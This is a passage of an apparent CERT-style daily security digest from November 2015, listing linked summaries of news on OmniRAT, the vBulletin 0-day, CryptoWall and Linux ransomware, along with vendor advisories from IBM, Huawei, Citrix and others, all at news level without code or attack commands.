---------------------------------------------
https://blog.sucuri.net/2015/11/jquery-min-php-malware-affects-thousands-of…
*** OmniRAT malware scurrying into Android, PC, Mac, Linux systems ***
---------------------------------------------
Leverages Stagefright scare for installs. As police across Europe crack down on the use of the DroidJack malware, a similar software nasty has emerged that can control not just Android, but also Windows, Mac, and Linux systems and is being sold openly at a fraction of the cost.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2015/11/06/omnirat_mal…
*** Check Point Discovers Critical vBulletin 0-Day ***
---------------------------------------------
As widely reported, the main vBulletin.org forum was compromised earlier this week and an exploit for a vBulletin 0-day was up for sale in online markets. A patch later released by vBulletin fixes the vulnerability reported, but fails to either credit any reporting or mention the appropriate CVE number. As the vulnerability is now fixed and an exploit exists in the wild with public analyses, we follow with the technical description as submitted to vBulletin.
---------------------------------------------
http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulle…
*** Peter Kieseberg @ 5th KIRAS Fachtagung ***
---------------------------------------------
Today Peter Kieseberg (SBA Research) presented the results of the SCUDO-Project together with Alexander Szönyi (Thales Austria) and Wolfgang Rosenkranz (Repuco) at the 5th 'KIRAS Fachtagung' in the Austria Trend Hotel Savoyen Vienna. This project was focused on the development of a training process for defence simulation trainings in the area of critical infrastructures ...
---------------------------------------------
https://www.sba-research.org/2015/11/05/peter-kieseberg-5th-kiras-fachtagun…
*** Bundestag wants to ban Flash for its staff ***
---------------------------------------------
After the serious hacker attack around six months ago, the German Bundestag wants to raise its IT security with a number of measures. Staff and members of parliament are to be required to use longer passwords and PINs of at least eight characters; in addition, Flash and other browser extensions are to be banned from the computers, as Spiegel Online reports, citing an internal document of the Bundestag administration.
---------------------------------------------
http://www.golem.de/news/nach-hackerangriff-bundestag-will-flash-verbieten-…
*** Slides from RUXCON, Oct. 24-25, Melbourne ***
---------------------------------------------
* DNS as a Defense Vector, Paul Vixie
* High Performance Fuzzing, Richard Johnson
* MalwAirDrop: Compromising iDevices via AirDrop, Mark Dowd
* Broadcasting Your Attack: Security Testing DAB Radio In Cars, Andy Davis
* Windows 10: 2 Steps Forward, 1 Step Back, James Forshaw
...
---------------------------------------------
https://ruxcon.org.au/slides/?year=2015
*** Tracking HTTP POST data with ELK, (Fri, Nov 6th) ***
---------------------------------------------
The Apache webserver has a very modular logging system. It is possible to customize what to log and how. But it lacks support for logging data submitted to the server via HTTP POST requests. Recently, I had to investigate suspicious HTTP traffic and one of the requirements was to analyze POST data. If you already have a solution which performs full packet capture, you're lucky, but it could quickly become a pain to search for information across gigabytes of PCAP files.
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20345&rss
*** Encryption ransomware threatens Linux users ***
---------------------------------------------
November 6, 2015. Doctor Web warns users about new encryption ransomware targeting Linux operating systems. Judging from the directories in which the Trojan encrypts files, one can draw the conclusion that the main target of the cybercriminals is website administrators on whose machines web servers are deployed. Doctor Web security researchers presume that at least tens of users have already fallen victim to this Trojan.
---------------------------------------------
http://news.drweb.com/show/?i=9686&lng=en&c=9
*** Advantech EKI Hard-coded SSH Keys Vulnerability ***
---------------------------------------------
This advisory provides mitigation details for a hard-coded SSH key vulnerability in Advantech's EKI-122X series products.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-15-309-01
*** ICIT Brief: Know Your Enemies - A Primer on Advanced Persistent Threat Groups ***
---------------------------------------------
This primer provides an overview of the threat landscape, attack vectors, size and sophistication of threat actors. Some of the Groups and Platforms include: The Elderwood Platform, Topsec, Axiom, Hidden Lynx, Deep Panda, PLA Unit 61398, Putter Panda, Tarh Andishan, Ajax, Bureau 121, Energetic Bear, Uroburos, APT 28, Hammertoss, CrazyDuke, Sandworm, Syrian Electronic Army, Anonymous and Butterfly Group among others.
---------------------------------------------
http://icitech.org/icit-brief-know-your-enemies-a-primer-on-advanced-persis…
*** Security Advisory: NTP vulnerability CVE-2015-7704 ***
---------------------------------------------
An off-path attacker can send a crafted Kiss of Death (KoD) packet to the client, which will increase the client's polling interval to a large value and effectively disable synchronization with the server.
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/17000/500/sol17566.htm…
*** Security Advisory - DoS Vulnerability in GPU Driver of Huawei Products ***
---------------------------------------------
Some Huawei products have a DoS vulnerability. An attacker may trick a user into installing a malicious application and use it to input invalid parameters into the GPU driver program of the products, which can crash the system of the device. (Vulnerability ID: HWPSIRT-2015-09017)
This vulnerability has been assigned Common Vulnerabilities and Exposures (CVE) ID: CVE-2015-7740.
Huawei has released software updates to fix these vulnerabilities.
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor…
*** Security Advisory - DoS Vulnerability in Camera Driver of Huawei Products ***
---------------------------------------------
Some Huawei products have a DoS vulnerability. An attacker who has the system or camera permission can input invalid parameters into the camera driver program to crash the system. (Vulnerability ID: HWPSIRT-2015-09013)
Huawei has released software updates to fix these vulnerabilities.
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor…
=======================
= End-of-Shift report =
=======================
Timeframe: Mittwoch 04-11-2015 18:00 − Donnerstag 05-11-2015 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** A Technical Look At Dyreza ***
---------------------------------------------
Inside the core of Dyreza - a look at its malicious functions and their implementation.
---------------------------------------------
https://blog.malwarebytes.org/intelligence/2015/11/a-technical-look-at-dyre…
*** Malicious spam with links to CryptoWall 3.0 - Subject: Domain [name] Suspension Notice, (Thu, Nov 5th) ***
---------------------------------------------
Introduction: Since Monday 2015-10-26, we've noticed a particular campaign sending malicious spam (malspam) with links to download CryptoWall 3.0 ransomware. This campaign has been impersonating domain registrars. Conrad Longmore blogged about it last week [1], and Techhelplist.com has a good write-up on the campaign [2]. Several other sources have also discussed this wave of malspam [3, 4, 5, 6, 7, 8 to name a few]. For this diary, we'll take a closer look at the emails and associated CryptoWall
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20333&rss
*** CryptoWall 4.0 Released with a New Look and Several New Features ***
---------------------------------------------
The fourth member of the CryptoWall family of ransomware, CryptoWall 4.0, has just been released, complete with new features and a brand new look. We recently reported that CryptoWall 3.0 has allegedly caused over $325 million in annual damages. CryptoWall first emerged in April 2014. Its first major upgrade was dubbed CryptoWall 2.0, and first emerged in October...
---------------------------------------------
http://securityaffairs.co/wordpress/41718/cyber-crime/cryptowall-4-0-releas…
*** SSL certificates: Microsoft wants to part with SHA-1 as early as next year ***
---------------------------------------------
In view of the new quality of attacks on the hash algorithm, the company is considering putting it on the banned list as early as mid-2016. Google and Mozilla are taking similar paths.
---------------------------------------------
http://heise.de/-2880134
*** Mabouia: The first ransomware in the world targeting MAC OS X ***
---------------------------------------------
Rafael Salema Marques, a Brazilian researcher, published a PoC about the existence of Mabouia ransomware, the first ransomware that targets MAC OS X. Imagine this scenario: You received a ransom warning on your computer stating that all your personal files had been locked. In order to unlock the files, you would have to pay $500.
---------------------------------------------
http://securityaffairs.co/wordpress/41755/cyber-crime/mabouia-ransomware-ma…
*** Meet the Android rooting adware that cannot be removed ***
---------------------------------------------
Researchers have identified a new strain of malicious adware that is impossible for affected Android device owners to uninstall.
---------------------------------------------
http://feedproxy.google.com/~r/SCMagazineHome/~3/Prm6r3X3tzk/
*** No C&C server needed: Russia menaced by offline ransomware ***
---------------------------------------------
Harder to take down, nyet? Miscreants have cooked up a new strain of ransomware that works offline and so might be more resistant to law enforcement takedown efforts as a result.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2015/11/05/offline_ran…
*** Thousands of legitimate iOS apps discovered containing ad library backdoors ***
---------------------------------------------
More than 2,000 iOS apps stocked in Apple's legitimate App Store reportedly contained backdoored versions of an ad library, which could have allowed for surveillance without users' knowledge.
---------------------------------------------
http://feedproxy.google.com/~r/SCMagazineHome/~3/nxOb5Ac0sYo/
*** The Omnipresence of Ubiquiti Networks Devices on the Public Web ***
---------------------------------------------
There are ongoing in-the-wild attacks against Ubiquiti Networks devices. Attackers are using default credentials to gain access to the affected devices via SSH. The devices are infected by a botnet client that is able to infect other devices. Further information about these attacks is available at:
Krebs on Security: http://krebsonsecurity.com/2015/06/crooks-use-hacked-routers-to-aid-cyberhe…
Research: https://www.incapsula.com/blog/ddos-botnet-soho-router.html
CARISIRT
---------------------------------------------
http://blog.sec-consult.com/2015/11/the-omnipresence-of-ubiquiti-networks.h…
*** vBulletin Exploits in the Wild ***
---------------------------------------------
The vBulletin team patched a serious object injection vulnerability yesterday, that can lead to full command execution on any site running on an out-of-date vBulletin version. The patch supports the latest versions, from 5.1.4 to 5.1.9. The vulnerability is serious and easy to exploit; it was used to hack and deface the main vBulletin.com website. As a...
---------------------------------------------
http://feedproxy.google.com/~r/sucuri/blog/~3/NNlPrHaDARs/vbulletin-exploit…
*** TalkTalk, Script Kids & The Quest for "OG" ***
---------------------------------------------
So you've got two-step authentication set up to harden the security of your email account (you do, right?). But when was the last time you took a good look at the security of your inbox's recovery email address? That may well be the weakest link in your email security chain, as evidenced by the following tale of an IT professional who saw two of his linked email accounts recently hijacked in a bid to steal his Twitter identity. Earlier this week, I heard from Chris Blake, a longtime KrebsOnSecurity...
---------------------------------------------
http://feedproxy.google.com/~r/KrebsOnSecurity/~3/im8m6Imwfsk/
*** Connecting the Dots in Cyber Threat Campaigns, Part 2: Passive DNS ***
---------------------------------------------
This is the second part of our series on "connecting the dots", where we investigate ways to link attacks together to gain a better understanding of how they are related. In Part 1, we looked...
---------------------------------------------
http://feedproxy.google.com/~r/PaloAltoNetworks/~3/7x_ynKHJKns/
*** Xen Project 4.5.2 Maintenance Release Available ***
---------------------------------------------
I am pleased to announce the release of Xen 4.5.2. Xen Project Maintenance releases are released roughly every 4 months, in line with our Maintenance Release Policy. We recommend that all users of the 4.5 stable series update to this point release.
---------------------------------------------
https://blog.xenproject.org/2015/11/05/xen-project-4-5-2-maintenance-releas…
*** Open-Xchange Input Validation Flaw in Printing Dialogs Lets Remote Users Conduct Cross-Site Scripting Attacks ***
---------------------------------------------
http://www.securitytracker.com/id/1034018
*** Bugtraq: [KIS-2015-10] Piwik <= 2.14.3 (DisplayTopKeywords) PHP Object Injection Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/archive/1/536839
*** Bugtraq: [KIS-2015-09] Piwik <= 2.14.3 (viewDataTable) Autoloaded File Inclusion Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/archive/1/536838
*** MIT Kerberos Multiple Bugs Let Remote Users Cause the Target Service to Crash ***
---------------------------------------------
http://www.securitytracker.com/id/1034084
*** [2015-11-05] Insecure default configuration in Ubiquiti Networks products ***
---------------------------------------------
Ubiquiti Networks products have remote administration enabled by default (WAN port). Additionally these products use the same certificates and private keys for administration via HTTPS.
---------------------------------------------
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2015…
*** Citrix XenServer Multiple Security Updates ***
---------------------------------------------
A number of security vulnerabilities have been identified in Citrix XenServer that may allow a malicious administrator of a guest VM to compromise ...
---------------------------------------------
http://support.citrix.com/article/CTX202404
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: IBM WebSphere MQ is affected by multiple vulnerabilities in IBM Runtime Environments Java Technology Edition, Versions 5, 6 & 7 ***
http://www.ibm.com/support/docview.wss?uid=swg21968485
---------------------------------------------
*** IBM Security Bulletin: Apache Tomcat as used in IBM QRadar SIEM is vulnerable to Denial of Service Attack. (CVE-2014-0230) ***
http://www.ibm.com/support/docview.wss?uid=swg21970036
---------------------------------------------
*** IBM Security Bulletin: Openstack Nova vulnerability affects IBM Cloud Manager with OpenStack (CVE-2015-2687) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022691
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in OpenSSL affects IBM DB2 LUW (CVE-2015-0204) ***
http://www.ibm.com/support/docview.wss?uid=swg21968869
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities identified in IBM Java SDK affect WebSphere Service Registry and Repository Studio (CVE-2015-2613 CVE-2015-2601 CVE-2015-2625 CVE-2015-1931) ***
http://www.ibm.com/support/docview.wss?uid=swg21969911
---------------------------------------------
*** PowerHA SystemMirror privilege escalation vulnerability (CVE-2015-5005) ***
http://www.ibm.com/support/
---------------------------------------------
*** IBM Security Bulletin: IBM Maximo Asset Management could allow an authenticated user to change work orders that the user should not have access to change (CVE-2015-7395) ***
http://www.ibm.com/support/docview.wss?uid=swg21969072
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in the Linux Kernel affect PowerKVM ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022785
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in Python affect PowerKVM (CVE-2013-5123, CVE-2014-8991) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022786
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in OpenSLP affects PowerKVM (CVE-2015-5177) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022876
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in Python-httplib2 affects PowerKVM (CVE-2013-2037) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022877
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in lcms affects PowerKVM (CVE-2015-4276) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022834
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in Libcrypt++ affects PowerKVM (CVE-2015-2141) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022879
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in lighttpd affects PowerKVM (CVE-2015-3200) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022837
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in wpa_supplicant may affect PowerKVM (CVE-2015-1863 and CVE-2015-4142) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022832
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in libXfont affect PowerKVM (CVE-2015-1802, CVE-2015-1803, CVE-2015-1804) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022787
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in Mozilla NSS affects PowerKVM (CVE-2015-2730) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022790
---------------------------------------------
*** IBM Security Bulletin: Information disclosure vulnerability could expose user personal data in IBM WebSphere Commerce (CVE-2015-5015) ***
http://www.ibm.com/support/docview.wss?uid=swg21969174
---------------------------------------------
*** IBM Security Bulletin: IBM Flex System Manager is affected by a vulnerability from FSM's use of strongswan: (CVE-2015-4171) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022817
---------------------------------------------
*** IBM Security Bulletin: IBM Netezza Host Management is vulnerable to a BIND 9 utility issue (CVE-2015-5722) ***
http://www.ibm.com/support/docview.wss?uid=swg21966952
---------------------------------------------